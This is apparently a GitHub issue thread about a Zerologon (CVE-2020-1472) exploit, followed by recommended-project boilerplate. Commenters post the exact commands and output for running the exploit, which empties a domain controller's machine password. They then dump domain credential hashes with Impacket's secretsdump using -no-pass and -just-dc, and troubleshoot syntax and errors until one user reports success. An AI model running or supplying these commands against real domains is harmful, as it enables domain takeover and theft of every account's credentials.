Comments (7)
syntax:
py -3 secretsdump.py -just-dc -no-pass your_dc_hostname$@your_dc_ip_addr
output like this:
Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:some_ntlm_hash:::
....
from cve-2020-1472.
You'll also need to specify the domain and DC machine account name with a $.
from cve-2020-1472.
Yes I tried that also but what is the exact syntax?
Because I tried this:
secretsdump.py -no-pass -just-dc DOMAIN/MACHINE_ACCOUNT$@
I also tried adding the option -just-dc-user but that also failed...
Could you help and post the exact syntax you use?
It might not be a syntax issue but I want to rule that out.
Thanks.
from cve-2020-1472.
@Balackie escape the dollar sign in the account name.
from cve-2020-1472.
I am getting errors trying to dump the hash. Is there anything wrong with my syntax?
python cve-2020-1472-exploit.py ad01 192.168.134.8 1 ?
Performing authentication attempts...
==========================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
(venv) +--(c0x65e?work-kali-desktop)-[~/repos/tools/impacket/examples]
+-$ python secretsdump.py -no-pass -just-dc 'test.local/[email protected]'
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Cannot create "sessionresume_TzJvYOJb" resume session file: [Errno 13] Permission denied: 'sessionresume_TzJvYOJb'
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
(venv) +--(c0x65e?work-kali-desktop)-[~/repos/tools/impacket/examples]
+-$ python secretsdump.py -no-pass -just-dc 'test.local/[email protected]' -use-vss 2 ?
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Searching for NTDS.dit
[-] 'NoneType' object has no attribute 'request'
[*] Cleaning up...
from cve-2020-1472.
Hi!
Thanks guys. It worked!
Best regards,
from cve-2020-1472.
@c0x65o seems it errors out because it can't write the restore file locally (permission issue). The VSS approach won't work because it requires local admin access.
from cve-2020-1472.
Related Issues (10)
- AttributeError: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2' HOT 11
- python37 attack fail HOT 2
- Restore Steps HOT 1
- Error while restoring password
- socket.gaierror: [Errno -2] Name or service not known HOT 2
- modify secretsdump.py to print hex values HOT 3
- Does not work with python 2 and 3.5 HOT 9
- close
- Question - isn't it supposed to clear password? Successful however I can still login to DC. Host that I am executing script is not tied to victim DC, may be that is the problem. HOT 2
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from cve-2020-1472.